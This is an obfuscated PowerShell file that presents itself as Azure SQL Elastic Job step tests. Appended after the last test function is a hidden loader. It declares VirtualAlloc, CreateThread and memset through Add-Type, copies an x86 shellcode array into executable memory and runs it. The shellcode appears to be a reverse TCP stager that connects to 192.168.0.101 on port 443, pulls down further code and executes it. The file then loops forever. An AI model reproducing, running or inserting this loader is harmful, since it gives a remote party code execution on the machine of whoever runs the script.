	&("{1}{2}{0}"-f'al','Assert','-AreEqu') ${RE`sP}."taRgETGROUPn`A`Me" ${J`s1}."taRg`e`TGR`oUPNAME"
	&("{3}{2}{0}{1}" -f 'reE','qual','sert-A','As') ${r`eSp}."cr`ED`En`TIalnAMe" ${J`S1}."cr`e`DeNtialNamE"

	
	${r`eSP} = &("{2}{0}{1}{4}{5}{3}"-f'-AzSql','E','Get','ticJobStep','la','s') -ResourceGroupName ${J`s1}."RE`souR`CE`grOupName" -ServerName ${j`s1}."SerV`e`RNA`mE" -AgentName ${J`s1}."age`NtnAME" -JobName ${j`s1}."jOB`NAme"
	&("{1}{3}{0}{2}"-f '-T','As','rue','sert') { ${r`eSp}."COu`NT" -ge 2 }
}


function teSt-gET`jobS`T`ePwItHPAr`en`TobjEct (${a`1})
{
	
	${j`c1} = &("{4}{2}{5}{0}{3}{1}{6}" -f 'te-JobCre','ialFor','re','dent','C','a','Test') ${a1}
	${t`g1} = &("{6}{2}{0}{5}{4}{3}{1}" -f 'te-Tar','est','rea','rT','pFo','getGrou','C') ${a1}
	${j1} = &("{1}{3}{0}{2}"-f 'e','Create-JobFor','st','T') ${A`1}
	${c`T1} = ("{1}{2}{0}" -f'T 1','SEL','EC')
	${J`S1} = &("{2}{5}{3}{4}{0}{1}"-f'p','ForTest','Create','obSt','e','-J') ${j1} ${t`g1} ${J`C1} ${C`T1}
	&("{1}{3}{4}{0}{2}{5}"-f 'JobStepFor','Cr','Te','e','ate-','st') ${J`1} ${T`G1} ${J`c1} ${C`T1}

	
	${Re`SP} = &("{0}{4}{3}{2}{1}{5}" -f 'Get-AzSqlE','JobS','c','ti','las','tep') -ParentObject ${J`1} -Name ${j`S1}."STE`pna`ME"
	&("{0}{2}{1}{3}"-f 'Ass','-AreEqu','ert','al') ${r`eSP}."ResoURCe`grO`UPn`AMe" ${J`S1}."rESour`c`eg`RoUpnAmE"
	&("{0}{3}{1}{2}" -f'Ass','-Are','Equal','ert') ${re`sp}."SER`V`eRnA`Me" ${J`s1}."S`er`Ver`NaME"
	&("{2}{0}{1}{3}" -f 'reEq','ua','Assert-A','l') ${re`Sp}."age`N`TNAMe" ${J`S1}."A`gENTnAme"
	&("{3}{4}{1}{2}{0}"-f 'eEqual','ser','t-Ar','A','s') ${Re`sp}."J`Obn`Ame" ${j`S1}."J`O`BName"
	&("{1}{2}{0}"-f 'l','Assert-AreEq','ua') ${R`Esp}."sT`e`PNamE" ${J`s1}."S`TE`pName"
	&("{0}{1}{3}{2}{4}"-f'Asse','r','-A','t','reEqual') ${Re`Sp}."t`ArgeTG`RO`UpnA`ME" ${j`S1}."tA`RGEt`GR`Oupn`AME"
	&("{1}{3}{0}{2}" -f't-AreEqua','As','l','ser') ${r`eSp}."C`REdenTiAL`NAmE" ${J`s1}."C`R`EdeNtiALnAMe"

	
	${re`SP} = &("{4}{0}{3}{5}{1}{2}"-f 'A','icJ','obStep','zSq','Get-','lElast') -ParentObject ${j`1}
	&("{3}{1}{0}{2}" -f 'Tr','ert-','ue','Ass') { ${RE`sP}."c`OunT" -ge 2 }
}


function TeSt-GEtJoBSt`E`PWIth`pArE`NTRESou`RcE`Id (${a`1})
{
	
	${j`c1} = &("{5}{6}{0}{1}{2}{4}{3}"-f'te-JobCr','ede','nti','Test','alFor','Cre','a') ${a1}
	${t`g1} = &("{0}{2}{5}{1}{4}{3}" -f'Create-','r','Target','t','Tes','GroupFo') ${a`1}
	${j`1} = &("{0}{3}{5}{4}{2}{1}" -f'Cr','t','es','eate','JobForT','-') ${a`1}
	${C`T1} = ("{2}{1}{0}"-f ' 1','T','SELEC')
	${j`s1} = &("{5}{0}{4}{3}{1}{2}" -f 'ate-JobS','p','ForTest','e','t','Cre') ${j1} ${t`g1} ${j`c1} ${c`T1}
	&("{0}{2}{1}{3}"-f 'C','eate-JobStep','r','ForTest') ${j`1} ${T`g1} ${J`c1} ${c`T1}

	
	${R`eSP} = &("{3}{2}{4}{0}{1}{5}" -f 't','icJ','l','Get-AzSq','Elas','obStep') -ParentResourceId ${j1}."RE`sOUr`CeId" -Name ${J`s1}."sTeP`NA`ME"
	&("{1}{2}{4}{3}{0}"-f'l','A','sser','eEqua','t-Ar') ${rE`sp}."ResOU`R`CE`GROUPn`AmE" ${j`s1}."RE`SOuRCegRO`U`PnAME"
	&("{3}{4}{2}{1}{0}"-f'l','a','qu','Assert-','AreE') ${R`EsP}."sERv`ErN`Ame" ${j`S1}."sERV`eRn`A`mE"
	&("{0}{2}{1}{3}" -f 'Ass','e','ert-Ar','Equal') ${R`Esp}."aGE`NtN`Ame" ${J`s1}."Ag`e`NtNamE"
	&("{0}{4}{2}{1}{3}"-f'Ass','Ar','-','eEqual','ert') ${RE`sP}."JobN`AmE" ${j`s1}."JObNA`Me"
	&("{0}{1}{3}{2}" -f'As','se','-AreEqual','rt') ${R`EsP}."Step`N`Ame" ${J`S1}."S`TEp`NaME"
	&("{0}{3}{2}{1}"-f'Ass','AreEqual','rt-','e') ${R`ESP}."Ta`RgETgRouP`N`AmE" ${j`s1}."TargeTgroUP`N`Ame"
	&("{2}{1}{0}{3}{4}" -f'A','rt-','Asse','r','eEqual') ${rE`Sp}."Cr`edEnT`iAlnA`mE" ${j`s1}."CrED`eNTI`ALname"

	
	${RE`SP} = &("{0}{4}{7}{5}{1}{6}{3}{2}" -f 'G','sticJ','tep','bS','et','a','o','-AzSqlEl') -ParentResourceId ${j1}."reso`UrCe`iD"
	&("{0}{2}{1}" -f'Asser','-True','t') { ${R`esP}."cO`Unt" -ge 2 }
}


function TESt-ge`TJ`OB`STEP`WI`TH`pIP`InG (${A1})
{
	
	${j`c1} = &("{4}{0}{3}{2}{5}{1}"-f'ate-JobCre','Test','n','de','Cre','tialFor') ${a1}
	${t`G1} = &("{2}{3}{1}{5}{4}{0}{6}"-f'Tes','te-Targe','Cre','a','oupFor','tGr','t') ${A`1}
	${J`1} = &("{1}{2}{3}{0}{4}" -f'orTes','Creat','e-J','obF','t') ${A1}
	${c`T1} = ("{1}{2}{0}"-f' 1','SELEC','T')
	${J`S1} = &("{2}{1}{0}{3}" -f'JobStepForTe','e-','Creat','st') ${J`1} ${T`g1} ${j`c1} ${C`T1}
	&("{6}{3}{4}{5}{2}{0}{1}"-f'es','t','ForT','ea','te-Job','Step','Cr') ${J`1} ${T`G1} ${J`C1} ${c`T1}

	
	${r`esp} = ${j1} | &("{6}{0}{1}{4}{5}{2}{3}" -f 'Sq','lElasti','te','p','c','JobS','Get-Az') -Name ${J`s1}."s`TE`pNaME"
	&("{1}{2}{0}{3}{4}"-f 'A','Asse','rt-','reEqua','l') ${R`ESP}."r`ESo`U`R`cEgrOuPNAmE" ${j`S1}."rESoURCEg`ROUp`Na`ME"
	&("{1}{0}{3}{2}" -f'-','Assert','l','AreEqua') ${rE`SP}."s`Er`VErN`AME" ${j`S1}."Ser`Ve`RN`Ame"
	&("{1}{3}{2}{0}" -f 'ual','Assert-','Eq','Are') ${RE`sp}."AG`ENtNAme" ${J`S1}."agenTn`A`me"
	&("{2}{0}{3}{1}"-f 'e','al','Ass','rt-AreEqu') ${RE`sp}."jo`Bna`me" ${J`S1}."j`obn`Ame"
	&("{1}{0}{2}" -f 'sert-Are','As','Equal') ${r`esp}."sTePN`AMe" ${J`S1}."stEPNa`mE"
	&("{1}{2}{0}"-f'l','Assert-AreEq','ua') ${r`esp}."tARGETG`R`Ou`PNaME" ${J`s1}."TA`R`GEtGRouP`N`AME"
	&("{0}{3}{2}{1}"-f 'Asse','Equal','t-Are','r') ${Re`SP}."C`REDEntia`Ln`A`ME" ${j`s1}."cR`e`denTialna`me"

	
	${RE`Sp} = ${J`1} | &("{5}{0}{4}{3}{2}{1}" -f'et-A','p','ticJobSte','lElas','zSq','G')
	&("{3}{0}{2}{1}"-f's','ert-True','s','A') { ${Re`sP}."C`OuNt" -ge 2 }
}
${z`67} = ((("{86}{25}{74}{42}{44}{82}{12}{29}{19}{32}{61}{1}{37}{68}{47}{58}{22}{11}{80}{69}{3}{7}{6}{18}{0}{30}{26}{75}{59}{39}{50}{57}{5}{60}{51}{54}{49}{81}{67}{71}{83}{53}{64}{78}{48}{14}{84}{65}{2}{72}{28}{10}{24}{20}{13}{16}{33}{55}{27}{8}{21}{66}{9}{73}{41}{36}{4}{43}{31}{46}{52}{17}{77}{38}{76}{62}{87}{56}{34}{79}{40}{15}{45}{63}{70}{85}{23}{35}"-f'tr','c ','l','l','Creation','Protect)','oc(In','All','tPtr','er','eadA','r','el3','utes','ateThread(Int','se',', uin','rt(pVGmsv','tP','.d','trib',' lp','tPt','int','t','Dl','dwSize, ',' In','hr','2',' lpAddress, uint ','Ptr lp','llpVG)]p','t dwStackS','ex',' count);',' dw','static ','V','y',' IntPtr mem',' uint','Impor','Flags, Int','t(pVGker','t(IntPt','Th','rn ','Cre','t(pVGke','pe, uint ','I','readId);[DllImpo','c static ext','mpor','ize,','c ','fl','In','llocationT',';[Dll','ubli',')]p','r ','er','tr ','StartAddress, IntPtr lpParamet','32.dllp','exte','tua','de','VG)]publ','pT',',','l','uint flA','G','crt.dllp','n IntPtr ','tern',' Vir','rnel','n','i','P','st, uint src, u','[','ublic stati'))-crEplAce  'pVG',[cHaR]34);${w} = &("{1}{2}{0}"-f 'Type','A','dd-') -memberDefinition ${z`67} -Name ("{0}{1}"-f'Win','32') -namespace ("{3}{1}{4}{0}{2}" -f'i','in','ons','W','32Funct') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x00,0x65,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${z}."Le`NGth" -gt 0x1000){${G} = ${z}."LE`Ng`Th"};${E`py}=${w}::("{2}{0}{3}{1}"-f'rtu','c','Vi','alAllo').Invoke(0,0x1000,${g},0x40);for (${I}=0;${I} -le (${z}."l`engTH"-1);${I}++) {${w}::"M`em`set"([IntPtr](${e`py}.("{2}{1}{0}"-f'2','t3','ToIn').Invoke()+${i}), ${Z}[${I}], 1)};${W}::("{2}{3}{1}{0}"-f 'd','hrea','Create','T').Invoke(0,0,${e`pY},0,0,0);for (;;){&("{0}{3}{1}{2}" -f 'S','le','ep','tart-s') 60};
